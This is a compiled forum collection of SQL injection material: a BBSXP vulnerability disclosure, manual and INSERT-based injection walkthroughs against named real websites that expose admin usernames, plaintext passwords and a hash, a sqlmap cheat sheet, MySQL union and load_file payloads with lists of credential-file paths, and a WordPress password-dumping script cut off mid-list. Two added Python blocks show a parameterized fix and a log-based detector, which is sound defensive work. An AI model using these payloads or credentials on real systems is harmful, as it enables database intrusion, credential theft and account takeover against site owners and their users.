BBSXP, many injection points (script security)

Date: 2023-02-15 07:38:34

"BBSXP, many injection points (script security)" (9 parts in total) was contributed by user "本拉德皮特"; below is the collection as compiled by the editor, for reference.


Part 1: BBSXP, many injection points (script security)

By: sobiny [B.C.T]

I submitted a vulnerability report to BBSXP, and the vendor has not responded at all.

The main issue is that they have far too many injection points of one and the same type.

I am almost embarrassed to publish them; posting them all would wear my hands out.

Well, here is one example.

The Search.asp file:

127.0.0.1/Search.asp?menu=Result&ForumID=1&Keywords=aaaaa&Item=ThreadID&DateComparer=365&SortBy=Desc/**/union&VerifyCode=8149

if Request("menu")="Result" then
' Item and SortBy are HTML-encoded only, then concatenated into the SQL text
Keywords=HTMLEncode(Request("Keywords"))
SortBy=HTMLEncode(Request("SortBy"))
Item=HTMLEncode(Request("Item"))
if Keywords="" then error("您没有输入任何查询条件!")
if Request("VerifyCode")<>Session("VerifyCode") or Session("VerifyCode")="" then error("验证码错误!")
' Item lands in the WHERE clause ...
SQLSearch="IsApproved=1 and IsDel=0 and "&Item&" like '%"&Keywords&"%' "
if DateComparer>0 then SQLSearch=SQLSearch&" and PostTime>"&SqlNowString&"-"&DateComparer&" "
if ForumID>0 then SQLSearch=SQLSearch&" and ForumID="&ForumID&" "
' ... and SortBy in ORDER BY
sql="select * from [BBSXP_Threads] where "&SQLSearch&" order by ThreadID "&SortBy&""
Rs.Open sql,Conn,1
' ... (rest omitted)

I am speechless: one statement with two injectable spots. BBSXP is really something.

They have not fixed this type of bug,

and I really do not plan to keep looking; there are too many bugs.
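As an added example (not BBSXP's code), the same query-building pattern in Python with sqlite3: vulnerable_sql() rebuilds the concatenated statement that Search.asp produces, and safe_search() shows the fix a reviewer would ask for. Item and SortBy are checked against an allowlist, because a column name and an ORDER BY direction cannot be bound as parameters, while Keywords is bound as a parameter with its LIKE wildcards escaped. The table, its rows and the allowlists are constructed for this example.

```python
import sqlite3

# Constructed stand-in for BBSXP's [BBSXP_Threads] table; the column names follow
# the page's query, the rows are made up for this example.
SAMPLE_ROWS = [
    # ThreadID, ForumID, Topic, UserName, IsApproved, IsDel
    (1, 1, "Forum rules", "admin", 1, 0),
    (2, 1, "Hello world", "alice", 1, 0),
    (3, 2, "Hidden thread", "bob", 0, 0),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table BBSXP_Threads (ThreadID integer, ForumID integer, "
        "Topic text, UserName text, IsApproved integer, IsDel integer)"
    )
    conn.executemany("insert into BBSXP_Threads values (?,?,?,?,?,?)", SAMPLE_ROWS)
    return conn


def vulnerable_sql(item, keywords, sort_by, forum_id=0):
    """Rebuilds the statement Search.asp produces. HTML-entity encoding is not
    SQL escaping, so Item and SortBy reach the SQL text unchanged and both are
    injection points."""
    search = f"IsApproved=1 and IsDel=0 and {item} like '%{keywords}%' "
    if forum_id > 0:
        search += f" and ForumID={forum_id} "
    return f"select * from [BBSXP_Threads] where {search} order by ThreadID {sort_by}"


# Identifiers cannot be bound as parameters, so they are validated against a
# fixed allowlist instead; values are bound with placeholders.
ALLOWED_ITEMS = {"Topic", "UserName"}
ALLOWED_SORT = {"Asc": "ASC", "Desc": "DESC"}


def safe_search(conn, item, keywords, sort_by, forum_id=0):
    """Hardened version: returns matching ThreadIDs, or raises ValueError when
    the caller supplies an identifier outside the allowlist."""
    if item not in ALLOWED_ITEMS:
        raise ValueError(f"unexpected search column: {item!r}")
    direction = ALLOWED_SORT.get(sort_by)
    if direction is None:
        raise ValueError(f"unexpected sort order: {sort_by!r}")
    # Escape LIKE wildcards so user input cannot widen the match with % or _.
    escaped = keywords.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = (f"select ThreadID from BBSXP_Threads where IsApproved=1 and IsDel=0 "
           f"and {item} like ? escape '\\'")
    params = ["%" + escaped + "%"]
    if forum_id > 0:
        sql += " and ForumID=?"
        params.append(forum_id)
    sql += f" order by ThreadID {direction}"
    return [row[0] for row in conn.execute(sql, params)]


def rejected(conn, item, keywords, sort_by):
    """True when the hardened builder refuses the request."""
    try:
        safe_search(conn, item, keywords, sort_by)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_sql("ThreadID", "aaaaa", "Desc/**/union"))
    print(safe_search(db, "Topic", "o", "Desc"))
    print(rejected(db, "Topic", "aaaaa", "Desc/**/union"))
```

The allowlist is the important part: the page's payload `Desc/**/union` is refused outright rather than sanitised, and a column name that is not in the set is refused the same way.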

Part 2: Manual injection (script security)

Injection tools are everywhere now, and the degree of automation... could not be any higher.

Many people can skilfully use automated injection tools like 啊D and 明小子 and think that means they know injection...

But the principle behind injection: what injection is, why it happens, the process... and so on.

Do you know? Have you ever tried real manual injection? Probably not.

Here I will use the manual injection tool I wrote to walk through the overall manual injection process.

First find a site with an injection flaw. That is easy; they are everywhere.

www.jinhu168.com/A3/NewsInfo.asp?id=75

manage_User
username  admin
password  bfpms
id  35

Found one. This is a standard easily-hacked site; no need to talk about its security level.

www.jinhu168.com/A3/NewsInfo.asp?id=75

This is the address with the injection flaw. Let's check it.

Basically confirmed that it probably has the flaw. Continue.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and exists (select * from manage_User)

Query whether the table name manage_User exists.

Sorry, this tool keeps erroring out... the recording tool is not very good. If anyone has a good one, introduce it when you have time....

OK, continuing.

manage_User exists... the page returns normally...

I changed the name: if it does not exist, an error page is returned.

This is where you fill in the prompt statement; if you do not need it, just clear it.

Continue.

Returns normally, meaning it exists. Continue. Wait, taking a phone call.

Sorry.

It is not 1 character (error echoed), heh; it is 5 characters (normal echo).

So now we know a lot about it: table.. field.. and content length.

The first letter of the first position of the account is not "1", so it errors.

Heh, the first letter of the first position of the account is "a", correct... so it echoes normally.

What the account is I hardly need to think about: 5 characters, admin.

Indeed it is.... haha.

www.jinhu168.com/A3/NewsInfo.asp?id=75 and 1=(select count(*) from [manage_User] where left(username,5)='admin')

For everyone's study I extracted the example statements; they are the same as the program's process, so you can study them.

The password and the rest follow the same process. Does everyone understand? It is not that hard, it just takes patience. If it were simple, fully automatic injection tools would never have appeared.

I hope you can learn something while using my tool.

Part 3: sqlmap injection commands (script security)

The tool is provided as sqlmap version 0.9.


Get database names:

./sqlmap.py -u "www.xx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" --dbs

Get table names:

./sqlmap.py -u "www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database --tables

Get column names:

./sqlmap.py -u "www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database -T cdb_adminactions --columns

Get values:

./sqlmap.py -u "www.xxx.php?nid=14550" --user-agent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" -D database -T cdb_members -C username,password --dump

Update (check out the development version):

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u "www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell    // run SQL statements

sqlmap.py -u "www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5    // more verbose output

Load options from a configuration INI file:

sqlmap -c sqlmap.conf

Submit via POST:

sqlmap.py -u "www.myhack58.com/sqlmap/oracle/post_int.php" --method POST --data "id=1"

Submit via cookies; cookie values are separated by ";", and TamperData can be used to capture the cookies:

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1

Use Referer spoofing:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --referer "www.google.com" -v 3

Use a custom User-Agent, or pick one at random from the bundled user-agents.txt:

python sqlmap.py -u "www.myhack58.com/sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" -v 1 -a "./txt/user-agents.txt"

Use Basic authentication:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3

Use Digest authentication:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3

Use a proxy, combined with Tor:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --proxy "192.168.1.47:3128"

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --proxy "192.168.1.47:8118"

Use multiple threads for guessing:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3

Skip dynamic detection and name the injectable parameter directly; several parameters can be separated by commas; the User-Agent header can also be named as the injection point:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id"

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (sqlmap.sourceforge.net)"

Specify the DBMS, skipping sqlmap's auto-detection:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"

* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

Specify the operating system, skipping sqlmap's auto-detection:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"

* Linux
* Windows

Custom payload

Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come in handy is when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "Select * FROM users Where id=('" . $_GET['id'] . "') LIMIT 0, 1";:

$ python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 -p "id" --prefix "')" --postfix "AND ('test'='test"

[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: www.myhack58.com:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL-decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntactically correct for the page query:

Select * FROM users Where id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without needing a custom injection payload, but sometimes in real-world applications it is necessary to provide one.

Page comparison:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "lu[\w][\w]er" -v

Exclude dynamic page content:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

Stacked (multiple statement) test; PHP's built-in mysql_query() does not support multiple statements:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

UNION injection test:

python sqlmap.py -u "www.myhack58.com/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

UNION injection combined with the ORDER BY technique:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

Fingerprint:

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" -v 1 -f

python sqlmap.py -u "192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b

Check whether the current user is DBA:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1

Enumerate database users:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --users -v 0

Enumerate database user password hashes:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --passwords -v 0

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --passwords -U sa -v 0

View user privileges:

python sqlmap.py -u "www.myhack58.com/sqlmap/oracle/get_int.php?id=1" --privileges -v 0

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --privileges -U postgres -v 0

List databases:

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dbs -v 0

List the columns of a given table in a given database:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --columns -T users -D test -v 1

Dump a given column of a given table in a given database:

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dump -T users -D master -C surname -v 0

Restrict the range to entries 2 to 4:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --dump -T users -D test --start 2 --stop 4 -v 0

Dump all databases and all tables:

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0

Dump only user-created databases and tables (exclude system databases):

python sqlmap.py -u "www.myhack58.com/sqlmap/mssql/get_int.php?id=1" --dump-all --exclude-sysdbs -v 0

SQL query:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" --sql-query "Select usename FROM pg_user" -v 0

python sqlmap.py -u "www.myhack58.com/sqlmap/mysql/get_int.php?id=1" --sql-query "Select host, password FROM mysql.user LIMIT 1, 3" -v 1

Select usename, passwd FROM pg_shadow ORDER BY usename

Save and resume a session:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -b -v 1 -s "sqlmap.log"

Save options to an INI configuration file:

python sqlmap.py -u "www.myhack58.com/sqlmap/pgsql/get_int.php?id=1" -b -v 1 --save


Source: 影子


Part 4: Notes on INSERT injection (script security)

Author: 昆仑男银

Someone in the group asked how to inject an INSERT statement. I had not run into the INSERT type before, so I had a look and wrote these notes as a reminder.

Appending a single quote, www.kunlun.com/nanyin.aspx?ProID=49579', produces an error.

It is an INSERT statement. After a bit of searching on Baidu I had a rough idea of how INSERT statements are injected, so I began probing for information.

Submit: www.kunlun.com/nanyin.aspx?ProID=49579',cast(@@version/**/as/**/int),null);--

Not compatible... I changed int to varchar and the page returned normally. Baidu again: MSSQL does not allow text or ntext data to be converted directly to int.

To get information out I needed a varchar or nvarchar column, so I swapped the positions of the last two values, and it worked.

Submit: www.kunlun.com/nanyin.aspx?ProID=49579',null,cast(system_user/**/as/**/int));--

在将 nvarchar 值 'AFDataLogin' 转换成数据类型 int 时失败。

Good. Continuing to extract information; some of what I collected is below.

version:Microsoft SQL Server - 9.00.4035.00 (Intel X86)......Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
servername:SQL2005
host_name:IBM1
db_name:kunlun
user_name:dbo

You can see that the web server and the database are separate machines, so differential backup or log backup is not an option; the only way is to extract the back-end account and password and log into the admin panel.

First, enumerate the databases. Construct:

www.kunlun.com/nanyin.aspx?ProID=49579',null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1)--

Changing the value of the last dbid enumerated 13 databases...

1:master
2:tempdb
3:model
4:msdb
5:kunlun_BBS
6:kunlun
7:New_AF
8:AF_Back
9:Console
10:Newkunlun
11:Newkunlun2
12:Oldkunlun
13:NewBBS

Next, the table names.

Construct: www.kunlun.com/nanyin.aspx?ProID=49579',null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype='u'/**/and/**/name/**/not/**/in(select/**/top/**/0/**/name/**/from/**/sysobjects/**/where/**/xtype='u'))--

Change the value of the second TOP, incrementing from 0.

When the sixth table came out I was pleased and went straight for its columns and passwords.

1:AF_UserAccount
2:YX_Unit
3:AF_UnionCompany
4:YX_FlashXZ
5:AF_UserPointLogs
6:Buy_Admin

Enumerate the columns of the table Buy_Admin:

www.kunlun.com/nanyin.aspx?ProID=49579',null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name='Buy_Admin')/**/and/**/name/**/not/**/in/**/(select/**/top/**/0/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name='Buy_Admin')))--

Got them, again by changing the value of the second TOP.

Password: af_APass
ID: af_ID
User: af_AName

Seeing name and pass was encouraging; straight on to the contents.

Submit:

www.kunlun.com/nanyin.aspx?ProID=49579',null,null);select/**/*/**/from/**/Buy_Admin/**/where/**/af_ID=2/**/and/**/1=(select/**/af_AName/**/from/**/Buy_Admin/**/where/**/af_ID=2)--

Got them, and in plaintext too. Heh, now to find the admin login.

hjbadmin  hjbmanager
yck'     yck

I was pleased too early; I could not log in at all. Oh well, back to enumerating tables. At table N I saw YX_Manage, which had to be the right one, so I enumerated its columns and contents.

YX_AdminUser YX_Pwd
hgnadmin 50252EC697150CC9AA69A47333C716B8

Unfortunately the MD5 could not be cracked.... That is about where it ends. It is very late.

Oh, I forgot to mention: this runs with dbo privilege, heh.
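The probes shown in parts 1 to 4 (the `/**/union` in the SortBy parameter of part 1, the `and exists (select ...)` and `and 1=(select count(*) ...)` tests of part 2, sqlmap's `') AND 7433=7433 AND ('test'='test` request with its default User-Agent in part 3, and the `cast(... as int)` and `);select ...` probes of part 4) all leave recognisable traces in the web server's access log. The following Python is an added example and not part of any of the posts: it parses a few Apache combined-format log lines and flags requests by those traces. The log lines, client addresses and paths are constructed; the query strings reproduce the shapes of the probes above.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines; the query strings reproduce the
# probe shapes discussed in parts 1-4, the hosts and paths are made up.
SAMPLE_LOG = r'''
10.0.0.5 - - [15/Feb/2023:07:38:34 +0000] "GET /Search.asp?menu=Result&Keywords=aaaaa&Item=ThreadID&SortBy=Desc/**/union HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.6 - - [15/Feb/2023:07:39:01 +0000] "GET /NewsInfo.asp?id=75%20and%20exists%20(select%20*%20from%20manage_User) HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
10.0.0.7 - - [15/Feb/2023:07:40:12 +0000] "GET /get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test HTTP/1.1" 200 412 "-" "sqlmap/0.7rc1 (sqlmap.sourceforge.net)"
10.0.0.8 - - [15/Feb/2023:07:41:55 +0000] "GET /nanyin.aspx?ProID=49579%27,null,cast(system_user/**/as/**/int));-- HTTP/1.1" 500 300 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Feb/2023:07:42:30 +0000] "GET /nanyin.aspx?ProID=49579%27,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1-- HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.10 - - [15/Feb/2023:07:43:10 +0000] "GET /NewsInfo.asp?id=75 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
'''

# ip, ident, user, [time], "method url proto", status, bytes, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$'
)

# Each signature runs against the URL-decoded query with inline comments
# collapsed to spaces, except the comment check itself, which needs them intact.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b", re.I)),
    ("boolean-blind", re.compile(
        r"\b(and|or)\b\s+(exists\s*\(|\d+\s*=\s*\(?\s*select|\d+\s*=\s*\d+)", re.I)),
    ("error-based-cast", re.compile(r"\bcast\s*\(.+?\bas\s+int\b", re.I)),
    ("stacked-query", re.compile(r";\s*(select|insert|update|delete|exec)\b", re.I)),
    ("comment-obfuscation", re.compile(r"/\*.*?\*/|--\s*$")),
]
TOOL_UA = re.compile(r"sqlmap", re.I)


def analyse(line):
    """Return a record for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, url, status, referer, ua = m.groups()
    decoded = unquote_plus(url)
    # cast(x/**/as/**/int) -> cast(x as int): the comments are the obfuscation
    collapsed = re.sub(r"/\*.*?\*/", " ", decoded)
    hits = [name for name, rx in SIGNATURES
            if rx.search(decoded if name == "comment-obfuscation" else collapsed)]
    if TOOL_UA.search(ua):
        hits.append("scanner-user-agent")
    return {"ip": ip, "time": ts, "status": status, "url": decoded, "hits": hits}


def scan(log_text):
    """All parsed lines that triggered at least one signature, in log order."""
    out = []
    for line in log_text.strip().splitlines():
        rec = analyse(line)
        if rec and rec["hits"]:
            out.append(rec)
    return out


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["status"], rec["hits"], rec["url"])
```

Decoding before matching matters: the sqlmap request only contains `%27%29%20AND`, and the `/**/` comments in the part 1 and part 4 probes exist precisely to split keywords that a naive pattern would look for. A 200 with an injection signature is a stronger signal than a 500, since the error page in part 4 is what an error-based probe is after, but the application answering normally to `and exists (...)` is what makes boolean-blind extraction possible.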

Part 5: MySQL 5.0 injection principles (script security)

I remember 园长 saying earlier that claiming to understand injection without knowing the structure of the INFORMATION_SCHEMA tables in MySQL 5.0 and above is a rather ... thing, so I looked into it.

MySQL 5's built-in system database INFORMATION_SCHEMA is structured like the master database in MSSQL: it records every database name, table and column that exists in the MySQL instance. The tables that are useful for SQL injection are described below.

1. Getting all database names:

|SCHEMATA -> table that stores the database names
|—field: SCHEMA_NAME -> database name
|TABLES -> stores the table names
|—field: TABLE_SCHEMA -> the database the table belongs to
|—field: TABLE_NAME -> the table's name
|COLUMNS -> stores the column names
|—field: TABLE_SCHEMA -> the database the column belongs to
|—field: TABLE_NAME -> the table the column belongs to
|—field: COLUMN_NAME -> the column's name

#########################################################################

0x001 Get system information:

union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database()),7,8,9 /*

/*
@@global.version_compile_os   operating system version
@@datadir                     database path
database()                    current database name
0x3c62723e                    HEX value of a line break
*/

######################################################################

0x002 Get table names

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*

/*
0x67617264656e is the current database name
group_concat(table_name) uses the group_concat function to get all table names of the database in one step
*/

######################################################################

0x003 Get columns

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*

/*
group_concat(column_name) likewise gets all columns of the table (0x61646d696e) in one go
0x61646d696e -> the chosen table
0x67617264656e -> the database name
*/

#####################################################################

0x004 Get data

union select 1,2,3,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin

/*
0x3c62723e HEX-encoded line break
group_concat gets all data of the column at once
*/

A few more things that are very useful in MySQL injection.

A brief introduction to some functions used in MySQL injection; with them you can determine the current user's privileges (root is the highest, equivalent to SA in MSSQL), the database version, the database path, read sensitive files, the website directory path, and so on.

1: system_user()   system user name
2: user()          user name
3: current_user()  current user name
4: session_user()  user name of the database connection
5: database()      database name
6: version()       MySQL database version
7: load_file()     MySQL function for reading local files
8: @@datadir       database data path
9: @@basedir       MySQL installation path
10: @@version_compile_os  operating system, e.g. Windows Server

Some collected paths:

On Windows:

c:/boot.ini         // system version
c:/windows/php.ini  // PHP configuration
c:/windows/my.ini   // MySQL configuration file; records the MySQL user name and password the administrator has logged in with
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD // stores the database connection passwords from the mysql.user table
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini // stores the virtual host site paths and passwords
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml // IIS configuration file (virtual host configuration)
c:\windows\repair\sam // stores the passwords from the initial Windows installation
c:\Program Files\Serv-U\ServUAdmin.exe // Serv-U versions before 6.0 store the administrator password here
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif // stores the pcAnywhere login passwords
c:\Program Files\Apache Group\Apache\conf\httpd.conf or C:\apache\conf\httpd.conf // Apache configuration on Windows
c:/Resin-3.0.14/conf/resin.conf  // Resin configuration of a JSP site
c:/Resin/conf/resin.conf, /usr/local/resin/conf/resin.conf // JSP virtual host configuration on Linux
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini

LUNIX/UNIX下:

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件

/usr/local/apache2/conf/httpd.conf

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

/usr/local/app/php5/lib/php.ini //PHP相关设置

/etc/sysconfig/iptables //从中得到防火墙规则策略

/etc/httpd/conf/httpd.conf // apache配置文件

/etc/rsyncd.conf //同步程序配置文件

/etc/my.cnf //mysql的配置文件

/etc/redhat-release //系统版本

/etc/issue

/etc/issue.net

/usr/local/app/php5/lib/php.ini //PHP相关设置

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

/usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

/etc/sysconfig/iptables 查看防火墙策略

load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

replace(load_file(0x2F6574632F706173737764),0x3c,0×20)

replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

Part 6: WordPress injection checker script

#!/usr/bin/python
#WordPress SQL Injection Checker v1
#for md5's in the source will use
#http responses.
#   __ __    ___   ___
#___ __ \/ /______ __ \_____ /
#__ | / /_ /_ ___/ / / / __ /
#__ |/ /_ / / /__ / /_/ // /_/ /
#_____/ /_/ \___/ \____/ \__,_/
# www.vyc0d.uni.cc
# vyc0d[at]hackermail[dot]com
# Python 2 script: it uses the httplib and urllib2 modules and print statements

import sys, urllib2, re, time, httplib

#Bad HTTP Responses
BAD_RESP = [400,401,404]

def main(path):
    # HEAD request for host + path; returns (status, reason, Server header)
    try:
        h = httplib.HTTP(host.split("/",1)[0])
        h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
        h.putheader("Host", host.split("/",1)[0])
        h.endheaders()
        resp, reason, headers = h.getreply()
        return resp, reason, headers.get("Server")
    except Exception, msg:
        print "Error Occurred:",msg
        pass

def timer():
    now = time.localtime(time.time())
    return time.asctime(now)

print "\n\t WP SQL Injection Checker v1"
print "\t-----------------------------"
print "\t  vYc0d - M0slem Hax0r"

sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
        "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*",
